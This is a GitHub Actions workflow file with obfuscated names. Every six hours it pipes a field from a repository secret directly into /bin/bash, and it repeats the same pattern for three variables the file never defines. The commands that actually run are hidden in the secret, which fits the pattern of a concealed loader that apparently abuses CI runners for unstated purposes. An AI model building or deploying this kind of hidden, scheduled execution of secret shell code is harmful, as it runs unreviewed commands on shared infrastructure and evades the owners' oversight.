name: yebawang8765
on:
  workflow_dispatch:
  schedule:
    - cron: '52 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yebawang8765
        env:
          erx28503: ${{ secrets.erx28503 }}
        run: |
          echo $erx28503 | jq -r .osse52781 | /bin/bash
          echo $v1 | jq -r .av47556 | /bin/bash
          echo $cfzz64966 | jq -r .w26529 | /bin/bash
          echo $i95969 | jq -r .p20242 | /bin/bash

